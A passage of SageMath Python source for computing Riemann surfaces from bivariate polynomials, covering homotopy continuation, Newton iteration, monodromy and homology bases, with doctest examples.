EXAMPLES::
sage: C=matrix(CC,3,3,[-4.5606e-31 + 1.2326e-31*I,
....: -0.21313 + 0.24166*I,
....: -3.4513e-31 + 0.16111*I,
....: -1.0175 + 9.8608e-32*I,
....: 0.30912 + 0.19962*I,
....: -4.9304e-32 + 0.39923*I,
....: 0.96793 - 3.4513e-31*I,
....: -0.091587 + 0.19276*I,
....: 3.9443e-31 + 0.38552*I])
sage: from sage.schemes.riemann_surfaces.riemann_surface import numerical_inverse
sage: max(abs(c) for c in (C^(-1)*C-C^0).list()) < 1e-10
False
sage: max(abs(c) for c in (numerical_inverse(C)*C-C^0).list()) < 1e-10
True
"""
R=C.parent()
prec = R.base_ring().prec()
mpall.mp.prec = prec
with mpall.workprec(prec):
Cmp=mpall.matrix([mpall.sage_to_mpmath(list(c),prec) for c in C])
PLU=mpall.lu(Cmp)
P,L,U=[ R([mpall.mpmath_to_sage(c,prec) for c in M]) for M in PLU]
return U.inverse()*L.inverse()*P
class ConvergenceError(ValueError):
r"""
Error object suitable for raising and catching when Newton iteration fails.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import ConvergenceError
sage: raise ConvergenceError("test")
Traceback (most recent call last):
...
ConvergenceError: test
sage: isinstance(ConvergenceError(),ValueError)
True
"""
pass
def differential_basis_baker(f):
r"""
Compute a differential bases for a curve that is nonsingular outside (1:0:0),(0:1:0),(0:0:1)
Baker's theorem tells us that if a curve has its singularities at the coordinate vertices and meets
some further easily tested genericity criteria,
then we can read off a basis for the regular differentials from the interior of the
Newton polygon spanned by the monomials. While this theorem only applies to special plane curves
it is worth implementing because the analysis is relatively cheap and it applies to a lot of
commonly encountered curves (e.g., curves given by a hyperelliptic model). Other advantages include
that we can do the computation over any exact base ring (the alternative Singular based method for
computing the adjoint ideal requires the rationals), and that we can avoid being affected by subtle bugs
in the Singular code.
``None`` is returned when ``f`` does not describe a curve of the relevant type. If ``f`` is of the relevant
type, but is of genus `0` then ``[]`` is returned (which are both False values, but they are not equal).
INPUT:
- `f` -- a bivariate polynomial
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import differential_basis_baker
sage: R.<x,y>=QQ[]
sage: f=x^3+y^3+x^5*y^5
sage: differential_basis_baker(f)
[y^2, x*y, x*y^2, x^2, x^2*y, x^2*y^2, x^2*y^3, x^3*y^2, x^3*y^3]
sage: f=y^2-(x-3)^2*x
sage: differential_basis_baker(f) is None
True
sage: differential_basis_baker(x^2+y^2-1)
[]
TESTS::
sage: from sage.schemes.riemann_surfaces.riemann_surface import differential_basis_baker
sage: R.<x,y>=QQ[]
sage: f = y^12 - x*(x - 1)^7
sage: differential_basis_baker(f) is None
True
"""
k = f.base_ring()
R = PolynomialRing(k,3,"x,y,z")
x,y,z = R.gens()
F = f(x/z,y/z).numerator()
W = [F] + [F.derivative(v) for v in R.gens()]
#we check that the singularities lie at (1:0:0),(0:1:0),(0:0:1)
#by checking that the eliminations of x, y, z result in (principal) ideals
#generated by a monomial. This is a sufficient condition, but not completely necessary.
#It's cheap to check, though.
for c in R.gens():
B = GCD([W[i].resultant(W[j],c) for i in range(4) for j in range(i)])
if len(B.monomials()) > 1:
return None
from sage.geometry.polyhedron.constructor import Polyhedron
D = { (k[0],k[1]): v for k,v in f.dict().items() }
P = Polyhedron(D)
kT = k['t']
#here we check the additional genericity conditions: that the polynomials
#along the edges of the newton polygon are square-free.
for e in P.bounded_edges():
h=kT([D.get(tuple(c),0) for c in Polyhedron(e).integral_points()])
if not h.is_squarefree():
return None
x,y = f.parent().gens()
return [x**(a[0]-1)*y**(a[1]-1) for a in P.integral_points() if P.interior_contains(a)]
class RiemannSurface(object):
r"""
Construct a Riemann Surface. This is specified by the zeroes of a bivariate
polynomial with rational coefficients `f(z,w) = 0`.
INPUT:
- ``f`` -- a bivariate polynomial with rational coefficients. The surface is
interpreted as the covering space of the coordinate plane in the first
variable.
- ``prec`` -- the desired precision of computations on the surface in bits
(default: 53)
- ``certification`` -- a boolean (default: True) value indicating whether
homotopy continuation is certified or not. Uncertified homotopy
continuation can be faster.
- ``differentials`` -- (default: None). If specified, provides a list of
polynomials `h` such that `h/(df/dw) dz` is a regular differential on the
Riemann surface. This is taken as a basis of the regular differentials, so
the genus is assumed to be equal to the length of this list. The results
from the homology basis computation are checked against this value.
Providing this parameter makes the computation independent from Singular.
For a nonsingular plane curve of degree `d`, an appropriate set is given
by the monomials of degree up to `d-3`.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^3 + 1
sage: RiemannSurface(f)
Riemann surface defined by polynomial f = -z^3 + w^2 + 1 = 0, with 53 bits of precision
Another Riemann surface with 100 bits of precision::
sage: S = RiemannSurface(f, prec=100); S
Riemann surface defined by polynomial f = -z^3 + w^2 + 1 = 0, with 100 bits of precision
sage: S.riemann_matrix() #abs tol 0.00000001
[0.500000000000000000000000... + 0.866025403784438646763723...*I]
We can also work with Riemann surfaces that are defined over fields with a
complex embedding, but since the current interface for computing genus and
regular differentials in Singular presently does not support extensions of
QQ, we need to specify a description of the differentials ourselves. We give
an example of a CM elliptic curve::
sage: Qt.<t> = QQ[]
sage: K.<a> = NumberField(t^2-t+3,embedding=CC(0.5+1.6*I))
sage: R.<x,y> = K[]
sage: f = y^2+y-(x^3+(1-a)*x^2-(2+a)*x-2)
sage: S = RiemannSurface(f,prec=100,differentials=[1])
sage: A = S.endomorphism_basis()
sage: len(A)
2
sage: all( len(T.minpoly().roots(K)) > 0 for T in A)
True
TESTS:
This elliptic curve has a relatively poorly conditioned set of branch
points, so it challenges the path choice a bit. The code just verifies that
the period is quadratic, because the curve has CM, but really the test is
that the computation completes at all.::
sage: prec = 50
sage: Qx.<t> = QQ[]
sage: CC = ComplexField(prec)
sage: g = t^2-t-1
sage: phiCC = g.roots(CC)[1][0]
sage: K.<phi> = NumberField(g, embedding=phiCC)
sage: R.<X,Y> = K[]
sage: f = Y^2+X*Y+phi*Y-(X^3-X^2-2*phi*X+phi)
sage: S = RiemannSurface(f,prec=prec, differentials=[1])
sage: tau = S.riemann_matrix()[0, 0]
sage: tau.algdep(6).degree() == 2
True
"""
def __init__(self, f, prec=53, certification=True, differentials=None):
r"""
TESTS::
sage: R.<z,w> = QQ[]
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: S = RiemannSurface(w^2 - z^3 + 1)
sage: TestSuite(S).run() #not tested; Unclear what pickling strategy is best.
"""
# Initializations.
self._prec = prec
self._certification = certification
self._R = f.parent()
if len(self._R.gens()) != 2:
raise ValueError('only bivariate polynomials supported.')
if f.degree() <= 1:
raise ValueError('equation must be of degree at least 2.')
z, w = self._R.gen(0), self._R.gen(1)
self._CC = ComplexField(self._prec)
self._RR = RealField(self._prec)
self._CCz = PolynomialRing(self._CC, [self._R.gen(0)])
self._CCw = PolynomialRing(self._CC, [self._R.gen(1)])
self.f = f
if differentials is not None:
self._differentials = [self._R(a) for a in differentials]
self.genus = len(self._differentials)
else:
B = differential_basis_baker(f)
if B is not None:
self._differentials = B
self.genus = len(B)
else:
self._differentials = None
self.genus = self._R.ideal(self.f).genus()
if self.genus < 0:
raise ValueError("Singular reports negative genus. Specify differentials manually.")
self.degree = self.f.degree(w)
self._dfdw = self.f.derivative(w)
self._dfdz = self.f.derivative(z)
self._discriminant = self.f.resultant(self._dfdw,w)
# Coefficients of the polynomial for use in homotopy continuation.
self._a0 = self._CCz(self.f.coefficient({w:self.degree})(self._CCz.gen(),0))
self._a0roots = self._a0.roots(multiplicities=False)
self._aks = [self._CCz(self.f.coefficient({w:self.degree - k - 1})
(self._CCz.gen(),0)) for k in range(self.degree)]
# Compute the branch locus. Takes the square-free part of the discriminant
# because of numerical issues.
self.branch_locus = []
for x in self._discriminant.factor():
self.branch_locus += self._CCz(x[0](self._CCz.gen(),0)).roots(multiplicities=False)
# Voronoi diagram and the important points associated with it
self.voronoi_diagram = Voronoi(voronoi_ghost(self.branch_locus,CC=self._CC))
self._vertices = [self._CC(x0,y0) for x0,y0 in self.voronoi_diagram.vertices]
self._wvalues = [self.w_values(z0) for z0 in self._vertices]
self._Sn = SymmetricGroup(srange(self.degree))
self._L = dict()
self._fastcall_f = fast_callable(f,domain=self._CC)
self._fastcall_dfdw = fast_callable(self._dfdw,domain=self._CC)
self._fastcall_dfdz = fast_callable(self._dfdz,domain=self._CC)
def __repr__(self):
r"""
Return a string representation of the Riemann surface class.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: RiemannSurface(f)
Riemann surface defined by polynomial f = -z^4 + w^2 + 1 = 0, with 53 bits of precision
"""
s = 'Riemann surface defined by polynomial f = %s = 0, with %s bits of precision'%(self.f, self._prec)
return s
def w_values(self, z0):
r"""
Returns the points lying on the surface above ``z0``.
INPUT:
- ``z0`` -- (complex) a point in the complex z-plane.
OUTPUT:
A set of complex numbers corresponding to solutions of `f(z_0,w) = 0`.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f)
Find the w-values above the origin, i.e. the solutions of `w^2 + 1 = 0`::
sage: S.w_values(0) # abs tol 1e-14
[-1.00000000000000*I, 1.00000000000000*I]
"""
return self.f(z0,self._CCw.gen(0)).roots(multiplicities=False)
@cached_method
def downstairs_edges(self):
r"""
Compute the edgeset of the Voronoi diagram.
OUTPUT:
A list of integer tuples corresponding to edges between vertices in the
Voronoi diagram.
EXAMPLES:
Form a Riemann surface, one with a particularly simple branch locus::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 + z^3 - z^2
sage: S = RiemannSurface(f)
Compute the edges::
sage: S.downstairs_edges()
[(0, 1), (0, 5), (1, 4), (2, 3), (2, 4), (3, 5), (4, 5)]
This now gives an edgeset which one could use to form a graph.
.. NOTE::
The numbering of the vertices is given by the Voronoi package.
"""
# Because of how we constructed the Voronoi diagram, the first n points
# correspond to the branch locus points.
# The regions of these points are all of the edges which don't go off
# to infinity, which are exactly the ones we want.
n = len(self.branch_locus)
desired_edges = [self.voronoi_diagram.regions[self.voronoi_diagram.point_region[i]] for i in range(n)]
# First construct the edges as a set because the regions will overlap
# and we don't want to have two of the same edge.
edges1 = set()
for c in desired_edges:
for j in range(len(c)-1):
edges1.add(frozenset((c[j],c[j+1])))
edges1.add(frozenset((c[0],c[-1])))
# Then make it into a list and sort it.
# The sorting is important - it will make computing the monodromy group
# MUCH easier.
# We orient all the edges so that we go from lower to higher
# numbered vertex for the continuation.
edges = [(i0,i1) if (i0 < i1) else (i1,i0) for (i0,i1) in edges1]
edges.sort()
return edges
def downstairs_graph(self):
r"""
Retun the Voronoi decomposition as a planar graph.
The result of this routine can be useful to interpret the labelling of
the vertices.
OUTPUT:
The Voronoi decomposition as a graph, with appropriate planar embedding.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f)
sage: S.downstairs_graph()
Graph on 11 vertices
Similarly one can form the graph of the upstairs edges, which is
visually rather less attractive but can be instructive to verify that a
homology basis is likely correctly computed.::
sage: G=Graph(S.upstairs_edges()); G
Graph on 22 vertices
sage: G.is_planar()
False
sage: G.genus()
1
sage: G.is_connected()
True
"""
G=Graph(self.downstairs_edges())
G.set_pos(dict(enumerate([list(v) for v in self._vertices])))
return G
def _compute_delta(self, z1, epsilon, wvalues=None):
r"""
Compute a delta for homotopy continuation when moving along a path.
INPUT:
- ``z1`` -- a complex number in the z-plane
- ``epsilon`` -- a real number, which is the minimum distance between
the w-values above ``z1``
- ``wvalues`` -- a list (default: ``None``). If specified, saves
recomputation.
OUTPUT:
A real number, which is a step size for moving along a path.
EXAMPLES:
Form a Riemann Surface::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f)
Pick a point which lies on the Voronoi diagram, and compute an
appropriate epsilon::
sage: z1 = S._vertices[0]
sage: currw = S.w_values(z1)
sage: n = len(currw)
sage: epsilon = min([abs(currw[i] - currw[n-j-1]) for i in range(n) for j in range(n-i-1)])/3
sage: S._compute_delta(z1, epsilon) # abs tol 1e-8
0.152628501142363
If the Riemann surface does not have certified homotopy continuation,
then the delta will just be the minimum distance away from a branch
point::
sage: T = RiemannSurface(f, certification=False)
sage: z1 = T._vertices[0]
sage: currw = T.w_values(z1)
sage: n = len(currw)
sage: epsilon = min([abs(currw[i] - currw[n-j-1]) for i in range(n) for j in range(n-i-1)])/3
sage: T._compute_delta(z1, epsilon) # abs tol 1e-8
0.381881307912987
"""
if self._certification:
if wvalues is None:
wvalues = self.w_values(z1)
# For computation of rho. Need the branch locus + roots of a0.
badpoints = self.branch_locus + self._a0roots
rho = min(abs(z1 - z) for z in badpoints) / 2
Y = max(abs(self._fastcall_dfdz(z1, wi)/self._fastcall_dfdw(z1, wi))
for wi in wvalues)
# compute M
upperbounds = [sum(ak[k] * (abs(z1) + rho)**k
for k in range(ak.degree()))
for ak in self._aks]
upperbounds.reverse()
# If a0 is a constant polynomial, it is obviously bounded below.
if self._a0roots == []:
lowerbound = self._CC(self._a0) / 2
else:
lowerbound = self._a0[self._a0.degree()]*prod(abs((zk - z1) - rho) for zk in self._a0roots) / 2
M = 2 * max((upperbounds[k]/lowerbound).abs().nth_root(k+1)
for k in range(self.degree-1))
return rho*(((rho*Y - epsilon)**2 + 4*epsilon*M).sqrt() - (rho*Y + epsilon))/(2*M - 2*rho*Y)
else:
# Instead, we just compute the minimum distance between branch
# points and the point in question.
return min(abs(b - z1) for b in self.branch_locus) / 2
def homotopy_continuation(self, edge):
r"""
Perform homotopy continuation along an edge of the Voronoi diagram using
Newton iteration.
INPUT:
- ``edge`` -- a tuple of integers indicating an edge of the Voronoi
diagram
OUTPUT:
A list of complex numbers corresponding to the points which are reached
when traversing along the direction of the edge. The ordering of these
points indicates how they have been permuted due to the weaving of the
curve.
EXAMPLES:
We check that continued values along an edge correspond (up to the
appropriate permutation) to what is stored. Note that the permutation
was originally computed from this data::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = z^3*w + w^3 + z
sage: S = RiemannSurface(f)
sage: edge1 = sorted(S.edge_permutations())[0]
sage: sigma = S.edge_permutations()[edge1]
sage: continued_values = S.homotopy_continuation(edge1)
sage: stored_values = S.w_values(S._vertices[edge1[1]])
sage: all( abs(continued_values[i]-stored_values[sigma(i)]) < 1e-8 for i in range(3))
True
"""
i0, i1 = edge
ZERO = self._RR.zero()
ONE = self._RR.one()
datastorage = []
z_start = self._CC(self._vertices[i0])
z_end = self._CC(self._vertices[i1])
path_length = abs(z_end - z_start)
def path(t):
return z_start*(1-t) + z_end*t
# Primary procedure.
T = ZERO
currw = self.w_values(path(T))
n = len(currw)
epsilon = min([abs(currw[i] - currw[j]) for i in range(1,n) for j in range(i)])/3
datastorage += [(T,currw,epsilon)]
while T < ONE:
delta = self._compute_delta(path(T), epsilon, wvalues=currw)/path_length
# Move along the path by delta.
T += delta
# If T exceeds 1, just set it to 1 and compute.
if T > ONE:
delta -= (T-ONE)
T = ONE
while True:
try:
neww = self._determine_new_w(path(T),currw,epsilon)
except ConvergenceError:
delta /= 2
T -= delta
else:
break
currw = neww
epsilon = min([abs(currw[i] - currw[j]) for i in range(1,n) for j in range(i)])/3
datastorage += [(T,currw,epsilon)]
self._L[edge] = datastorage
return currw
def _determine_new_w(self, z0, oldw, epsilon):
r"""
A procedure to Newton iterate a list of w-values simultaneously.
Used primarily for moving along the surface for integration or
homotopy continuation.
INPUT:
- ``z0`` -- a complex number
- ``oldw`` -- a list of w-values which are presumed to be guesses of
the w-values above ``z0``.
- ``epsilon`` -- the minimum distance between the points of ``oldw``
divided by 3
OUTPUT:
A list of points the same length as ``oldw`` corresponding to the new
newton iterated points.
However, if the newton iteration exceedes the alloted attempts, or exits
the ``epsilon`` ball, raises a convergence error.
EXAMPLES:
First, a trivial example where we guess exactly what the roots are::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f)
sage: z0 = S._vertices[0]
sage: epsilon = 0.1
sage: oldw = S.w_values(z0)
sage: neww = S._determine_new_w(z0,oldw,epsilon); neww #abs tol 0.00000001
[-0.934613146929672 + 2.01088055918363*I,
0.934613146929672 - 2.01088055918363*I]
Which should be exactly the same as the w-values we started with.::
sage: abs(neww[0] - oldw[0]) #abs tol 0.00000001
0.000000000000...
sage: abs(neww[1] - oldw[1]) #abs tol 0.00000001
0.000000000000...
Here is an example where we exit the ``epsilon`` bound. This approach is
based on the homotopy continuation procedure which traverses along a
path and attempts newton iteration::
sage: g = z^3*w + w^3 + z
sage: T = RiemannSurface(g)
sage: z0 = T._vertices[2]*(0.9) - T._vertices[15]*(0.1)
sage: epsilon = 0.5
sage: oldw = T.w_values(T._vertices[2])
sage: T._determine_new_w(z0,oldw,epsilon)
[-0.562337685361648 + 0.151166007149998*I,
0.640201585779414 - 1.48567225836436*I,
-0.0778639004177661 + 1.33450625121437*I]
"""
# Tools of newton iteration.
F = self._fastcall_f
dF = self._fastcall_dfdw
neww = []
prec = self._CC.prec()
# Iterate over all roots.
for i in range(len(oldw)):
delta = F(z0,oldw[i])/dF(z0,oldw[i])
Ndelta = delta.norm()
wi = oldw[i]-delta
#it is possible in theory that Newton iteration fails to converge
#without escaping. We catch this by capping the number of iterations
#by 100
for j in range(100):
# If we exceed the epsilon bound from homotopy continuation,
# terminate.
if abs(wi - oldw[i]) >= epsilon:
raise ConvergenceError("Newton iteration escaped neighbourhood")
new_delta = F(z0,wi)/dF(z0,wi)
Nnew_delta = new_delta.norm()
# If we found the root exactly, or if delta only affects half the digits and
# stops getting smaller, we decide that we have converged.
if (new_delta == 0) or (Nnew_delta>=Ndelta and
Ndelta.sign_mantissa_exponent()[2]+prec < wi.norm().sign_mantissa_exponent()[2]):
neww.append(wi)
break
delta=new_delta
Ndelta=Nnew_delta
wi-=delta
# If we run 100 iterations without a result, terminate.
else:
raise ConvergenceError("Newton iteration fails to converge after %s iterations" % j)
return neww
def _newton_iteration(self, z0, oldw, epsilon):
r"""
A non-vectorized Newton iteration procedure used for integration.
INPUT:
- ``z0`` -- a complex number.
- ``oldw`` -- a w-value which is presumed to be a guess of one of
the w-values above ``z0``.
- ``epsilon`` -- the minimum distance between the w-values divided by 3.
OUTPUT:
A complex number, which should be a w-value above ``z0``.
However, if the Newton iteration exceedes the alloted attempts, or exits
the ``epsilon`` ball, raises a convergence error.
EXAMPLES:
First, a trivial example where we guess exactly what the root is::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f)
sage: z0 = S._vertices[0]
sage: epsilon = 0.1
sage: oldw = S.w_values(z0)[0]
sage: neww = S._newton_iteration(z0,oldw,epsilon); neww #abs tol 0.00000001
-0.934613146929672 + 2.01088055918363*I
Which should be exactly the same as the w-value we started with::
sage: oldw - neww #abs tol 0.00000001
0.000000000000000
Here is an example where we exit the epsilon bound. This approach is
based on the homotopy continuation procedure which traverses along a
path and attempts newton iteration::
sage: g = z^3*w + w^3 + z
sage: T = RiemannSurface(g)
sage: z0 = T._vertices[2]*(0.9) - T._vertices[15]*(0.1)
sage: epsilon = 0.5
sage: oldw = T.w_values(T._vertices[2])[0]
sage: T._newton_iteration(z0, oldw, epsilon)
-0.562337685361648 + 0.151166007149998*I
"""
F = self._fastcall_f
dF = self._fastcall_dfdw
prec = self._CC.prec()
delta = F(z0,oldw)/dF(z0,oldw)
Ndelta = delta.norm()
neww = oldw-delta
eps_squared = epsilon**2
#it is possible in theory that Newton iteration fails to converge
#without escaping. We catch this by capping the number of iterations
#by 100
for j in range(100):
if (neww-oldw).norm() > eps_squared:
raise ConvergenceError("Newton iteration escaped neighbourhood")
new_delta = F(z0,neww)/dF(z0,neww)
Nnew_delta = new_delta.norm()
# If we found the root exactly, or if delta only affects half the digits and
# stops getting smaller, we decide that we have converged.
if (new_delta == 0) or (Nnew_delta>=Ndelta and
Ndelta.sign_mantissa_exponent()[2]+prec < neww.norm().sign_mantissa_exponent()[2]):
return neww
delta = new_delta
Ndelta = Nnew_delta
neww-=delta
raise ConvergenceError("Newton iteration fails to converge")
@cached_method
def upstairs_edges(self):
r"""
Compute the edgeset of the lift of the downstairs graph onto the Riemann
surface.
OUTPUT:
An edgeset between vertices (i, j), where i corresponds to the i-th
point in the Voronoi diagram vertices, and j is the j-th w-value
associated with that point.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 + z^3 - z^2
sage: S = RiemannSurface(f)
sage: edgeset = S.upstairs_edges()
sage: len(edgeset) == S.degree*len(S.downstairs_edges())
True
sage: {(v[0],w[0]) for v,w in edgeset} == set(S.downstairs_edges())
True
"""
edgeset = []
n = len(self._wvalues[0])
# Lifts each edge individually.
for e in self.downstairs_edges():
i0, i1 = e
# Epsilon for checking w-value later.
epsilon = min([abs(self._wvalues[i1][i] - self._wvalues[i1][n-j-1]) for i in range(n) for j in range(n-i-1)])/3
# Homotopy continuation along e.
homotopycont = self.homotopy_continuation(e)
for i in range(len(homotopycont)):
# Checks over the w-values of the next point to check which it is.
for j in range(len(self._wvalues[i1])):
if abs(homotopycont[i] - self._wvalues[i1][j]) < epsilon:
# Once it finds the appropriate w-value, adds the edge.
edgeset = edgeset + [[(i0,i),(i1,j)]]
continue
return edgeset
def _edge_permutation(self, edge):
r"""
Compute the permutation of the w-values above a point in the z-plane
when moving along an edge in the Voronoi diagram.
INPUT:
- ``edge`` -- an edge on the Voronoi diagram
OUTPUT:
A permutation corresponding to how the roots interchange when moving
along the edge.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = z^3*w + w^3 + z
sage: S = RiemannSurface(f)
Compute the edge permutation of (1,2) on the Voronoi diagram::
sage: S._edge_permutation((1,2))
(0,2,1)
This indicates that while traversing along the direction of `(5,16)`,
the 2nd and 3rd layers of the Riemann surface are interchanging.
"""
if edge in self.downstairs_edges():
#find all upstairs edges that are lifts of the given downstairs edge
#and store the corresponding indices at start and end that label the
#branches upstairs.
L = [(j0,j1) for ((i0,j0),(i1,j1)) in self.upstairs_edges() if edge==(i0,i1)]
#we should be finding exactly "degree" of these
assert len(L) == self.degree
#and as a corollary of how we construct them, the indices at the start
#should be in order
assert all(a==b[0] for a,b in enumerate(L))
return self._Sn([j1 for j0,j1 in L])
else:
raise ValueError('edge not in Voronoi diagram')
@cached_method
def edge_permutations(self):
r"""
Compute the permutations of branches associated to each edge.
Over the vertices of the Voronoi decomposition around the branch locus,
we label the fibres. By following along an edge, the lifts of the edge
induce a permutation of that labelling.
OUTPUT:
A dictionary with as keys the edges of the Voronoi decomposition and as
values the corresponding permutations.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 + z^2+1
sage: S = RiemannSurface(f)
sage: S.edge_permutations()
{(0, 2): (),
(0, 4): (),
(1, 2): (),
(1, 3): (0,1),
(1, 6): (),
(2, 0): (),
(2, 1): (),
(2, 5): (0,1),
(3, 1): (0,1),
(3, 4): (),
(4, 0): (),
(4, 3): (),
(5, 2): (0,1),
(5, 7): (),
(6, 1): (),
(6, 7): (),
(7, 5): (),
(7, 6): ()}
"""
D=dict( (e,self._edge_permutation(e)) for e in self.downstairs_edges())
for e in list(D.keys()):
D[(e[1],e[0])]=D[e]**(-1)
return D
@cached_method
def monodromy_group(self):
r"""
Compute local monodromy generators of the Riemann surface.
For each branch point, the local monodromy is encoded by a permutation.
The permutations returned correspond to positively oriented loops around
each branch point, with a fixed base point. This means the generators
are properly conjugated to ensure that together they generate the global
monodromy. The list has an entry for every finite point stored in
``self.branch_locus``, plus an entry for the ramification above infinity.
OUTPUT:
A list of permutations, encoding the local monodromy at each branch
point.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z, w> = QQ[]
sage: f = z^3*w + w^3 + z
sage: S = RiemannSurface(f)
sage: G = S.monodromy_group(); G
[(0,1,2), (0,1), (0,2), (1,2), (1,2), (1,2), (0,1), (0,2), (0,2)]
The permutations give the local monodromy generators for the branch
points::
sage: list(zip(S.branch_locus + [unsigned_infinity], G)) #abs tol 0.0000001
[(0.000000000000000, (0,1,2)),
(-1.31362670141929, (0,1)),
(-0.819032851784253 - 1.02703471138023*I, (0,2)),
(-0.819032851784253 + 1.02703471138023*I, (1,2)),
(0.292309440469772 - 1.28069133740100*I, (1,2)),
(0.292309440469772 + 1.28069133740100*I, (1,2)),
(1.18353676202412 - 0.569961265016465*I, (0,1)),
(1.18353676202412 + 0.569961265016465*I, (0,2)),
(Infinity, (0,2))]
We can check the ramification by looking at the cycle lengths and verify
it agrees with the Riemann-Hurwitz formula::
sage: 2*S.genus-2 == -2*S.degree + sum(e-1 for g in G for e in g.cycle_type())
True
"""
n = len(self.branch_locus)
G = Graph(self.downstairs_edges())
#we get all the regions
loops = [self.voronoi_diagram.regions[i][:] for i in self.voronoi_diagram.point_region]
#and construct their Voronoi centers as complex numbers
centers = self.branch_locus + [self._CC(x,y) for x,y in self.voronoi_diagram.points[n:]]
for center, loop in zip(centers,loops):
if -1 in loop:
#for loops involving infinity we take the finite part of the path
i = loop.index(-1)
loop[:] = loop[i+1:]+loop[:i]
else:
#and for finite ones we close the paths
loop.append(loop[0])
#we make sure the loops are positively oriented wrt. their center
v0 = self._vertices[loop[0]]
v1 = self._vertices[loop[1]]
M = Matrix([list(v0-center),list(v1-center)])
if M.det() < 0:
loop.reverse()
#we stitch together the paths that are part of loops through
#infinity. There should be a unique way of doing so.
inf_loops = loops[n:]
inf_path = inf_loops.pop()
while (inf_loops):
inf_path += (inf_loops.pop())[1:]
assert inf_path[0] == inf_path[-1]
loops = loops[:n]
loops.append(inf_path)
P0 = loops[0][0]
monodromy_gens = []
edge_perms = self.edge_permutations()
SG = self._Sn
for c in loops:
to_loop = G.shortest_path(P0, c[0])
to_loop_perm = SG.prod(edge_perms[(to_loop[i], to_loop[i + 1])]
for i in range(len(to_loop) - 1))
c_perm = SG.prod(edge_perms[(c[i], c[i + 1])]
for i in range(len(c) - 1))
monodromy_gens.append(to_loop_perm * c_perm * ~to_loop_perm)
return monodromy_gens
@cached_method
def homology_basis(self):
r"""
Compute the homology basis of the Riemann surface.
OUTPUT:
A list of paths `L = [P_1, \dots, P_n]`. Each path `P_i` is of the form
`(k, [p_1 ... p_m, p_1])`, where `k` is the number of times to traverse
the path (if negative, to traverse it backwards), and the `p_i` are
vertices of the upstairs graph.
EXAMPLES:
In this example, there are two paths that form the homology basis::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: g = w^2 - z^4 + 1
sage: S = RiemannSurface(g)
sage: S.homology_basis() #random
[[(1, [(3, 1), (5, 0), (9, 0), (10, 0), (2, 0), (4, 0),
(7, 1), (10, 1), (3, 1)])],
[(1, [(8, 0), (6, 0), (7, 0), (10, 0), (2, 0), (4, 0),
(7, 1), (10, 1), (9, 1), (8, 0)])]]
In order to check that the answer returned above is reasonable, we
test some basic properties. We express the faces of the downstairs graph
as ZZ-linear combinations of the edges and check that the projection
of the homology basis upstairs projects down to independent linear
combinations of an even number of faces::
sage: dg = S.downstairs_graph()
sage: edges = dg.edges()
sage: E = ZZ^len(edges)
sage: edge_to_E = { e[:2]: E.gen(i) for i,e in enumerate(edges)}
sage: edge_to_E.update({ (e[1],e[0]): -E.gen(i) for i,e in enumerate(edges)})
sage: face_span = E.submodule([sum(edge_to_E[e] for e in f) for f in dg.faces()])
sage: def path_to_E(path):
....: k,P = path
....: return k*sum(edge_to_E[(P[i][0],P[i+1][0])] for i in range(len(P)-1))
sage: hom_basis = [sum(path_to_E(p) for p in loop) for loop in S.homology_basis()]
sage: face_span.submodule(hom_basis).rank()
2
sage: [sum(face_span.coordinate_vector(b))%2 for b in hom_basis]
[0, 0]
"""
if self.genus == 0:
return []
edgesu = self.upstairs_edges()
cycles = Graph(edgesu).cycle_basis()
# Computing the Gram matrix.
cn = len(cycles)
# Forming a list of lists of zeroes. Later this will be converted into a
# matrix.
intersectionprod = [[0 for c in cycles] for c in cycles]
#as it turns out, in extreme examples argument computation can be quite dominant
#so we cache this (since we may end up using these values multiple times)
direction_cache = {}
def direction(center,neighbour):
k=(center,neighbour)
if k not in direction_cache:
theta=(self._vertices[neighbour]-self._vertices[center]).argument()
direction_cache[k]=theta
return theta
else:
return direction_cache[k]
# This loop will start at the entry (0,1), and proceed along the row up
# til (0,cn-1).
# Then it will go to entry (1,2), and proceed along the row, etc.
for i in range(1,cn):
for j in range(i):
# Initializing the intersection product value.
intsum = 0
# Intersection of the edges
intsec = set(cycles[i]).intersection(set(cycles[j]))
for v in intsec:
# Get indices of the vertex in the cycles.
i0 = cycles[i].index(v)
i1 = cycles[j].index(v)
# Get the complex value of the vertex v.
center = cycles[i][i0][0]
# We are in the following situation:
# We have two paths a_in->v->a_out and
# b_in->v->b_out intersecting. We say they
# are "positively oriented" if the a-path
